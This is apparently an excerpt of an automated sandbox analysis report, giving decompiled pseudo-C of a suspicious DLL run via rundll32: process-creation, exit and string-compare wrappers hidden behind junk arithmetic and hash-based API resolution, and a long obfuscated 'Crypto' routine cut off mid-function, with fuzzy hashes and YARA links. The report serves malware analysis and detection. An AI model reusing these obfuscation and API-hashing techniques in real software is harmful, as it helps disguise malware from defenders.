                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 272 35679c-356863 call 34cf25 call 342d9f CreateProcessW
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E0035679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				void* _t40;
				int _t46;
				WCHAR* _t50;

				_push(_a64);
				_t50 = __ecx;
				_push(_a60);
				_push(0);
				_push(0);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0034CF25(_t40);
				_v24 = 0x639852;
				_v20 = 0;
				_v12 = 0x9647c4;
				_v12 = _v12 + 0x4343;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x0009af77;
				_v16 = 0x17e0ca;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x000f0fb4;
				_v8 = 0x429f7b;
				_v8 = _v8 + 0xffff27c2;
				_v8 = _v8 + 0xb08b;
				_v8 = _v8 ^ 0x004b6691;
				E00342D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
				return _t46;
			}











                                                                                                                      0x003567a4
                                                                                                                      0x003567a9
                                                                                                                      0x003567ab
                                                                                                                      0x003567ae
                                                                                                                      0x003567af
                                                                                                                      0x003567b0
                                                                                                                      0x003567b3
                                                                                                                      0x003567b4
                                                                                                                      0x003567b7
                                                                                                                      0x003567ba
                                                                                                                      0x003567bb
                                                                                                                      0x003567be
                                                                                                                      0x003567c1
                                                                                                                      0x003567c4
                                                                                                                      0x003567c7
                                                                                                                      0x003567c8
                                                                                                                      0x003567cb
                                                                                                                      0x003567cf
                                                                                                                      0x003567d0
                                                                                                                      0x003567d5
                                                                                                                      0x003567df
                                                                                                                      0x003567e2
                                                                                                                      0x003567e9
                                                                                                                      0x003567f0
                                                                                                                      0x003567f4
                                                                                                                      0x003567fb
                                                                                                                      0x00356802
                                                                                                                      0x00356806
                                                                                                                      0x0035680d
                                                                                                                      0x00356814
                                                                                                                      0x0035681b
                                                                                                                      0x00356822
                                                                                                                      0x00356842
                                                                                                                      0x0035685c
                                                                                                                      0x00356863

                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 0035685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: 78ef1a02057fd09af68a016db5b0aa6c5cbaf613d199ca2ab50e65f5b8d3ab86
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: C121E972901248BBCF159F95CD09CDFBFB9EF99714F008148FA1466120D7B69A64DBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00353CBB Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 277 353cbb-353d40 call 342d9f ExitProcess
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00353CBB() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t37;

				_v20 = _v20 & 0x00000000;
				_v24 = 0x868838;
				_v16 = 0xb6c7ac;
				_t37 = 0x79;
				_v16 = _v16 * 0x7d;
				_v16 = _v16 ^ 0x593c5b8b;
				_v8 = 0x23929;
				_v8 = _v8 | 0xd856564b;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x67f2afdd;
				_v12 = 0x42ac5b;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x0009f0c4;
				E00342D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
				ExitProcess(0);
			}









                                                                                                                      0x00353cc1
                                                                                                                      0x00353cc7
                                                                                                                      0x00353cce
                                                                                                                      0x00353cdb
                                                                                                                      0x00353ce2
                                                                                                                      0x00353ce5
                                                                                                                      0x00353cec
                                                                                                                      0x00353cf3
                                                                                                                      0x00353cfa
                                                                                                                      0x00353cfe
                                                                                                                      0x00353d01
                                                                                                                      0x00353d08
                                                                                                                      0x00353d19
                                                                                                                      0x00353d1c
                                                                                                                      0x00353d31
                                                                                                                      0x00353d3b

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 00353D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: cef62541cdaf8434eb5169240d690ad3b1cb60fc73bc950ec841407bf7f6aa8f
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: 5501E2B6D0120CFBDB04DFE5D946A9DBBB0EB40304F508199E925AB290D7B86B54DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035FC96 Relevance: 1.3, APIs: 1, Instructions: 41stringCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 297 35fc96-35fd28 call 34cf25 call 342d9f lstrcmpiW
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0035FC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t32;
				int _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0034CF25(_t32);
				_v8 = 0x178fa1;
				_v8 = _v8 | 0x2f4d5c19;
				_v8 = _v8 + 0xda24;
				_t42 = 0x35;
				_v8 = _v8 / _t42;
				_v8 = _v8 ^ 0x00e923af;
				_v16 = 0xca5f26;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x97c71065;
				_v12 = 0xeb54f5;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0000b8cd;
				E00342D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
				_t40 = lstrcmpiW(_a12, _a4); // executed
				return _t40;
			}









                                                                                                                      0x0035fc9c
                                                                                                                      0x0035fc9f
                                                                                                                      0x0035fca2
                                                                                                                      0x0035fca7
                                                                                                                      0x0035fcac
                                                                                                                      0x0035fcb6
                                                                                                                      0x0035fcbf
                                                                                                                      0x0035fccb
                                                                                                                      0x0035fcd3
                                                                                                                      0x0035fcd6
                                                                                                                      0x0035fcdd
                                                                                                                      0x0035fce4
                                                                                                                      0x0035fce8
                                                                                                                      0x0035fcef
                                                                                                                      0x0035fcf6
                                                                                                                      0x0035fcfa
                                                                                                                      0x0035fd15
                                                                                                                      0x0035fd23
                                                                                                                      0x0035fd28

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(?,0000B8CD), ref: 0035FD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: d3c195c4912506a27d8d7a4f97cb2a72a48deb3866c2443fca7df0c2752512e7
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: 07010276D00208BFDF05EFE4C84A89EBBB1AB44304F108098E9146A250DBB69B649B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Non-executed Functions

                                                                                                                      Function 00361B54 Relevance: 28.6, Strings: 22, Instructions: 1066COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00361B54() {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v48;
				char _v56;
				signed int _v60;
				signed int _v72;
				intOrPtr _v76;
				char _v84;
				char _v96;
				signed int _v100;
				char _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v128;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				unsigned int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				unsigned int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				unsigned int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				unsigned int _v572;
				signed int _v576;
				signed int _v580;
				unsigned int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _t1099;
				signed int _t1109;
				void* _t1121;
				signed int _t1139;
				signed int _t1147;
				signed int _t1167;
				void* _t1171;
				signed int _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1178;
				signed int _t1179;
				signed int _t1180;
				signed int _t1181;
				signed int _t1182;
				signed int _t1183;
				signed int _t1184;
				signed int _t1185;
				signed int _t1186;
				signed int _t1187;
				signed int _t1272;
				signed int _t1273;
				signed int _t1279;
				void* _t1281;
				signed int _t1288;
				signed int _t1309;
				void* _t1311;
				void* _t1314;
				void* _t1315;
				void* _t1316;

				_t1311 = (_t1309 & 0xfffffff8) - 0x250;
				_v116 = _v116 & 0x00000000;
				_v120 = 0xa23e30;
				_v592 = 0x3a1cca;
				_v592 = _v592 * 0x70;
				_t1281 = 0x5cbbc19;
				_v592 = _v592 ^ 0x2f3849e0;
				_t9 =  &_v592; // 0x2f3849e0
				_t1172 = 6;
				_v592 =  *_t9 / _t1172;
				_v592 = _v592 ^ 0x090e23e8;
				_v236 = 0x87b10f;
				_v236 = _v236 << 0x10;
				_v236 = _v236 ^ 0xb10f0000;
				_v516 = 0x461834;
				_v516 = _v516 ^ 0x02f635e2;
				_t1173 = 0x21;
				_v516 = _v516 / _t1173;
				_v516 = _v516 | 0x474321ea;
				_v516 = _v516 ^ 0x4757fbfb;
				_v216 = 0xd2c0b1;
				_v216 = _v216 >> 1;
				_v216 = _v216 ^ 0x006de7f5;
				_v480 = 0xeb5e0b;
				_v480 = _v480 + 0xffffa941;
				_t1272 = 0x43;
				_v480 = _v480 / _t1272;
				_v480 = _v480 | 0xc166e67d;
				_v480 = _v480 ^ 0xc1675dee;
				_v488 = 0xe6f87d;
				_v488 = _v488 ^ 0x80ff234c;
				_v488 = _v488 ^ 0x24b1b453;
				_v488 = _v488 + 0xa7fe;
				_v488 = _v488 ^ 0xa4a91779;
				_v276 = 0x5f17b9;
				_v276 = _v276 << 3;
				_v276 = _v276 ^ 0x02fd9db5;
				_v344 = 0x4c006c;
				_v344 = _v344 >> 0xe;
				_v344 = _v344 | 0xcdf796ee;
				_v344 = _v344 ^ 0xcdf61224;
				_v200 = 0x45df15;
				_v200 = _v200 + 0x6060;
				_v200 = _v200 ^ 0x004b7917;
				_v208 = 0xca7f26;
				_v208 = _v208 ^ 0x913d6520;
				_v208 = _v208 ^ 0x91fcdbd5;
				_v588 = 0xb1f4cb;
				_v588 = _v588 + 0x6758;
				_t87 =  &_v588; // 0x6758
				_v588 =  *_t87 * 0x4f;
				_v588 = _v588 ^ 0x925d082a;
				_v588 = _v588 ^ 0xa5589431;
				_v508 = 0xf7df1e;
				_v508 = _v508 + 0xd118;
				_v508 = _v508 + 0xffffbf54;
				_v508 = _v508 + 0x17fc;
				_v508 = _v508 ^ 0x00fe0a31;
				_v380 = 0x7e02fb;
				_v380 = _v380 + 0xf589;
				_v380 = _v380 ^ 0x91d98710;
				_v380 = _v380 ^ 0x91abdaf6;
				_v504 = 0xb08a0e;
				_v504 = _v504 * 0x77;
				_t1174 = 0x77;
				_v504 = _v504 / _t1174;
				_v504 = _v504 >> 2;
				_v504 = _v504 ^ 0x002dfbde;
				_v372 = 0x813d4a;
				_t1175 = 0x6c;
				_v372 = _v372 * 0x4a;
				_v372 = _v372 / _t1175;
				_v372 = _v372 ^ 0x005da134;
				_v484 = 0x855e16;
				_v484 = _v484 ^ 0xbfb8346c;
				_t1176 = 0x5f;
				_v484 = _v484 / _t1176;
				_v484 = _v484 + 0xfcf8;
				_v484 = _v484 ^ 0x02037e81;
				_v240 = 0xec674d;
				_v240 = _v240 | 0xfc3e6c49;
				_v240 = _v240 ^ 0xfcfddb47;
				_v364 = 0x61d0f9;
				_v364 = _v364 + 0xffffb344;
				_v364 = _v364 / _t1272;
				_v364 = _v364 ^ 0x000105b5;
				_v472 = 0x31ce7b;
				_t1177 = 0x51;
				_v472 = _v472 * 0x26;
				_v472 = _v472 >> 0xc;
				_v472 = _v472 >> 3;
				_v472 = _v472 ^ 0x0004fff0;
				_v224 = 0x9583f6;
				_v224 = _v224 / _t1177;
				_v224 = _v224 ^ 0x000db43c;
				_v324 = 0x1fdef9;
				_v324 = _v324 ^ 0xa62571f8;
				_v324 = _v324 ^ 0x1b5a0dd0;
				_v324 = _v324 ^ 0xbd66a263;
				_v232 = 0xd74a0b;
				_v232 = _v232 >> 6;
				_v232 = _v232 ^ 0x0003c3e3;
				_v376 = 0x9dde1e;
				_v376 = _v376 << 4;
				_v376 = _v376 + 0x9dbb;
				_v376 = _v376 ^ 0x09d67643;
				_v172 = 0x65dbd5;
				_v172 = _v172 >> 0xf;
				_v172 = _v172 ^ 0x000c80e9;
				_v400 = 0x3c4de1;
				_v400 = _v400 ^ 0xf2f914cc;
				_t1178 = 0x12;
				_v400 = _v400 / _t1178;
				_v400 = _v400 ^ 0x0d7ab358;
				_v312 = 0x3bea2f;
				_t216 =  &_v312; // 0x3bea2f
				_t1167 = 0xc;
				_v312 =  *_t216 / _t1167;
				_v312 = _v312 + 0xffff5e93;
				_v312 = _v312 ^ 0x000042d8;
				_v392 = 0x83f9ee;
				_v392 = _v392 >> 0xb;
				_v392 = _v392 * 0x24;
				_v392 = _v392 ^ 0x00021c0f;
				_v500 = 0x95bd51;
				_v500 = _v500 ^ 0x1620baa4;
				_v500 = _v500 | 0xd04cbe8c;
				_v500 = _v500 * 0x26;
				_v500 = _v500 ^ 0xe9af68de;
				_v548 = 0x57ee13;
				_v548 = _v548 | 0xcfcc72ac;
				_v548 = _v548 << 0xe;
				_v548 = _v548 + 0x6b2a;
				_v548 = _v548 ^ 0xffb12270;
				_v300 = 0xa3111e;
				_v300 = _v300 + 0xed59;
				_v300 = _v300 | 0xdcd78075;
				_v300 = _v300 ^ 0xdcf05604;
				_v432 = 0xce194f;
				_v432 = _v432 ^ 0x23730281;
				_v432 = _v432 ^ 0x3635ea1c;
				_v432 = _v432 + 0x939b;
				_v432 = _v432 ^ 0x1587da76;
				_v288 = 0x2cf49d;
				_v288 = _v288 << 3;
				_v288 = _v288 ^ 0x016df807;
				_v584 = 0x20f3bb;
				_v584 = _v584 ^ 0x1d2fae62;
				_v584 = _v584 ^ 0x98b788a9;
				_v584 = _v584 >> 4;
				_v584 = _v584 ^ 0x0858582d;
				_v464 = 0xcbd192;
				_v464 = _v464 * 0x21;
				_v464 = _v464 + 0xffff109b;
				_v464 = _v464 | 0xd92be105;
				_v464 = _v464 ^ 0xdb61e2c2;
				_v256 = 0x6d4d8e;
				_v256 = _v256 ^ 0x2793e4ee;
				_v256 = _v256 ^ 0x27fc61d0;
				_v264 = 0x15e89c;
				_v264 = _v264 * 0x43;
				_v264 = _v264 ^ 0x05baa293;
				_v568 = 0x46d03d;
				_v568 = _v568 + 0xffffbff8;
				_v568 = _v568 << 2;
				_v568 = _v568 + 0xffff0322;
				_v568 = _v568 ^ 0x011861cf;
				_v576 = 0x876e5a;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 << 2;
				_v576 = _v576 << 0xa;
				_v576 = _v576 ^ 0x000133c4;
				_v552 = 0xa4c770;
				_v552 = _v552 + 0x64e6;
				_v552 = _v552 + 0xffff80c6;
				_v552 = _v552 << 2;
				_v552 = _v552 ^ 0x029c8e96;
				_v560 = 0x48961c;
				_v560 = _v560 * 0x1d;
				_v560 = _v560 * 0x3a;
				_v560 = _v560 + 0x764e;
				_v560 = _v560 ^ 0xdceaabba;
				_v412 = 0x2483ba;
				_v412 = _v412 * 0x74;
				_v412 = _v412 >> 0xa;
				_v412 = _v412 ^ 0x000035b1;
				_v416 = 0x4a6b09;
				_v416 = _v416 >> 8;
				_v416 = _v416 * 0x64;
				_v416 = _v416 ^ 0x001bf6ce;
				_v544 = 0x85ae90;
				_v544 = _v544 + 0xffff7005;
				_v544 = _v544 + 0x7ae9;
				_t1179 = 0x70;
				_v544 = _v544 * 0x32;
				_v544 = _v544 ^ 0x1a1ce9dc;
				_v396 = 0x6298d9;
				_v396 = _v396 | 0x50e275a2;
				_v396 = _v396 ^ 0x271fbe87;
				_v396 = _v396 ^ 0x77f03e33;
				_v404 = 0x9d84c7;
				_v404 = _v404 ^ 0x3ba1d94b;
				_v404 = _v404 | 0x0d5acb53;
				_v404 = _v404 ^ 0x3f764d37;
				_v528 = 0xd0c26f;
				_v528 = _v528 + 0xffffb09d;
				_v528 = _v528 << 0xb;
				_v528 = _v528 << 4;
				_v528 = _v528 ^ 0x398aae1f;
				_v388 = 0x32973e;
				_v388 = _v388 << 2;
				_v388 = _v388 * 0x2a;
				_v388 = _v388 ^ 0x213686d9;
				_v536 = 0x39ae26;
				_v536 = _v536 << 0xf;
				_v536 = _v536 << 0xa;
				_v536 = _v536 / _t1179;
				_v536 = _v536 ^ 0x00ab5ee0;
				_v248 = 0x4dbe58;
				_v248 = _v248 + 0xffff3c39;
				_v248 = _v248 ^ 0x00419814;
				_v512 = 0x88f16f;
				_v512 = _v512 ^ 0xa76fdbfb;
				_v512 = _v512 >> 6;
				_v512 = _v512 >> 8;
				_v512 = _v512 ^ 0x0003ac5e;
				_v520 = 0xecc987;
				_v520 = _v520 + 0xffffc052;
				_v520 = _v520 + 0xf02b;
				_v520 = _v520 >> 1;
				_v520 = _v520 ^ 0x007e0ff3;
				_v448 = 0xa9e1d5;
				_v448 = _v448 >> 4;
				_v448 = _v448 * 0x52;
				_v448 = _v448 + 0xffff6960;
				_v448 = _v448 ^ 0x036fa180;
				_v316 = 0x9fe24f;
				_v316 = _v316 + 0xa7e4;
				_v316 = _v316 + 0xf070;
				_v316 = _v316 ^ 0x00a7512c;
				_v192 = 0x8e20a3;
				_v192 = _v192 | 0xc4ed4dcd;
				_v192 = _v192 ^ 0xc4e9d97e;
				_v356 = 0x174f56;
				_v356 = _v356 << 0x10;
				_v356 = _v356 + 0xffffdf01;
				_v356 = _v356 ^ 0x4f50aec2;
				_v496 = 0xdc9606;
				_v496 = _v496 ^ 0x6ace7a56;
				_v496 = _v496 * 0x30;
				_v496 = _v496 + 0xfffff4e3;
				_v496 = _v496 ^ 0xe3827260;
				_v332 = 0xa7fb69;
				_v332 = _v332 * 0x63;
				_v332 = _v332 << 0xe;
				_v332 = _v332 ^ 0x8e6ea02b;
				_v340 = 0x77d063;
				_v340 = _v340 << 0x10;
				_v340 = _v340 | 0x739acc9c;
				_v340 = _v340 ^ 0xf3f6b748;
				_v348 = 0x5928cc;
				_v348 = _v348 >> 0xf;
				_t1180 = 0x18;
				_v348 = _v348 / _t1180;
				_v348 = _v348 ^ 0x000e8dd0;
				_v580 = 0xc190b9;
				_v580 = _v580 | 0xa624a591;
				_v580 = _v580 + 0xe71e;
				_v580 = _v580 << 7;
				_v580 = _v580 ^ 0x734fcbc3;
				_v272 = 0x6fe611;
				_v272 = _v272 ^ 0xf87d83ea;
				_v272 = _v272 ^ 0xf818aed7;
				_v572 = 0x6e5414;
				_v572 = _v572 >> 1;
				_v572 = _v572 + 0xffff4a68;
				_v572 = _v572 >> 2;
				_v572 = _v572 ^ 0x00016dfd;
				_v336 = 0xd3ff38;
				_v336 = _v336 + 0x8bfd;
				_v336 = _v336 + 0xd3a2;
				_v336 = _v336 ^ 0x00d246e6;
				_v328 = 0xf94d52;
				_t1273 = 0x3e;
				_v328 = _v328 / _t1273;
				_t1181 = 0x24;
				_v328 = _v328 * 0x1d;
				_v328 = _v328 ^ 0x00711f28;
				_v540 = 0x8f9a1e;
				_v540 = _v540 >> 0x10;
				_v540 = _v540 / _t1181;
				_v540 = _v540 >> 8;
				_v540 = _v540 ^ 0x00084c95;
				_v204 = 0x67c7c8;
				_v204 = _v204 ^ 0xa03849cc;
				_v204 = _v204 ^ 0xa0586462;
				_v168 = 0xf8e7c3;
				_v168 = _v168 >> 0xe;
				_v168 = _v168 ^ 0x000525ac;
				_v268 = 0x34c26b;
				_v268 = _v268 + 0xffff2a86;
				_v268 = _v268 ^ 0x0031ec13;
				_v444 = 0x3e264e;
				_v444 = _v444 + 0xffff5a03;
				_v444 = _v444 + 0xffff0530;
				_v444 = _v444 / _t1167;
				_v444 = _v444 ^ 0x0004d416;
				_v408 = 0xc2db9d;
				_v408 = _v408 >> 0xa;
				_t1182 = 0x45;
				_v408 = _v408 * 0x2e;
				_v408 = _v408 ^ 0x0003d428;
				_v284 = 0xb1ae15;
				_v284 = _v284 / _t1182;
				_v284 = _v284 ^ 0x76771441;
				_v284 = _v284 ^ 0x7674d71a;
				_v176 = 0x3bb565;
				_v176 = _v176 >> 8;
				_v176 = _v176 ^ 0x00099a5e;
				_v556 = 0x6a82d;
				_v556 = _v556 | 0x5ffe742f;
				_v556 = _v556 ^ 0x54ef9d89;
				_v556 = _v556 ^ 0x0b1ff9f1;
				_v492 = 0xf83eb1;
				_v492 = _v492 + 0xffff2212;
				_v492 = _v492 ^ 0x7ea721cb;
				_v492 = _v492 << 0xe;
				_v492 = _v492 ^ 0x104665e9;
				_v260 = 0xd66584;
				_v260 = _v260 << 0x10;
				_v260 = _v260 ^ 0x6587874e;
				_v196 = 0x15bb54;
				_t1183 = 0x25;
				_v196 = _v196 / _t1183;
				_v196 = _v196 ^ 0x00053e57;
				_v304 = 0x2a83c9;
				_v304 = _v304 + 0xffff5d87;
				_t1184 = 0x6d;
				_v304 = _v304 * 0x67;
				_v304 = _v304 ^ 0x10d4d127;
				_v368 = 0xeff39c;
				_v368 = _v368 ^ 0xf5cbb50f;
				_v368 = _v368 * 0x5c;
				_v368 = _v368 ^ 0x190e2d63;
				_v452 = 0xbc1e04;
				_v452 = _v452 << 5;
				_v452 = _v452 + 0xffffa111;
				_v452 = _v452 * 0x46;
				_v452 = _v452 ^ 0x6ded43b0;
				_v532 = 0x100915;
				_v532 = _v532 << 2;
				_v532 = _v532 / _t1184;
				_v532 = _v532 | 0x4dc043eb;
				_v532 = _v532 ^ 0x4dc2f031;
				_v180 = 0x7666bb;
				_v180 = _v180 | 0xd9d36c1a;
				_v180 = _v180 ^ 0xd9fe02b9;
				_v228 = 0x101871;
				_v228 = _v228 + 0xfd23;
				_v228 = _v228 ^ 0x00150742;
				_v320 = 0x576952;
				_v320 = _v320 ^ 0x6dcdfa8e;
				_v320 = _v320 ^ 0xbcce16b6;
				_v320 = _v320 ^ 0xd150af1c;
				_v436 = 0x61cf51;
				_v436 = _v436 | 0x824da9c6;
				_v436 = _v436 << 9;
				_t1185 = 0x60;
				_v436 = _v436 * 0x49;
				_v436 = _v436 ^ 0xb2c360cd;
				_v352 = 0xa391d1;
				_v352 = _v352 | 0xdcfa9fff;
				_v352 = _v352 ^ 0xdcf1f745;
				_v564 = 0xf1659a;
				_v564 = _v564 + 0xffff5528;
				_v564 = _v564 + 0x18ad;
				_v564 = _v564 + 0xffffd31e;
				_v564 = _v564 ^ 0x00f86590;
				_v280 = 0x69bbd1;
				_v280 = _v280 | 0xbb53cb0d;
				_v280 = _v280 ^ 0xbb7bc9ca;
				_v460 = 0x6f67b0;
				_v460 = _v460 + 0x36fc;
				_v460 = _v460 / _t1185;
				_v460 = _v460 ^ 0xf8a19ae6;
				_v460 = _v460 ^ 0xf8a43848;
				_v384 = 0x580713;
				_v384 = _v384 | 0xcbb08146;
				_v384 = _v384 ^ 0x925bb18e;
				_v384 = _v384 ^ 0x59a45563;
				_v164 = 0x5d29b5;
				_v164 = _v164 >> 0xa;
				_v164 = _v164 ^ 0x00076669;
				_v244 = 0x191d5f;
				_v244 = _v244 | 0x49e37966;
				_v244 = _v244 ^ 0x49fb1589;
				_v188 = 0x46d1ad;
				_v188 = _v188 + 0x38d0;
				_v188 = _v188 ^ 0x00414091;
				_v252 = 0x41545b;
				_v252 = _v252 + 0xffff6c46;
				_v252 = _v252 ^ 0x0041c692;
				_v220 = 0xd9c785;
				_v220 = _v220 >> 0xc;
				_v220 = _v220 ^ 0x000bd8b6;
				_v468 = 0x7d74e9;
				_v468 = _v468 + 0xffffbc8b;
				_v468 = _v468 + 0xfffffc2d;
				_t1186 = 0x57;
				_v468 = _v468 / _t1186;
				_v468 = _v468 ^ 0x0004d984;
				_v160 = 0xd5db41;
				_v160 = _v160 ^ 0xba014a41;
				_v160 = _v160 ^ 0xbad79809;
				_v596 = 0x24c82;
				_t1187 = 0x61;
				_v596 = _v596 * 0x73;
				_v596 = _v596 << 3;
				_v596 = _v596 * 0x39;
				_v596 = _v596 ^ 0xd6e8d727;
				_v212 = 0xac3173;
				_v212 = _v212 + 0xffff1aaf;
				_v212 = _v212 ^ 0x00aa5431;
				_v424 = 0x84c7ec;
				_v424 = _v424 ^ 0xbfe14e08;
				_v424 = _v424 | 0xf779bbf5;
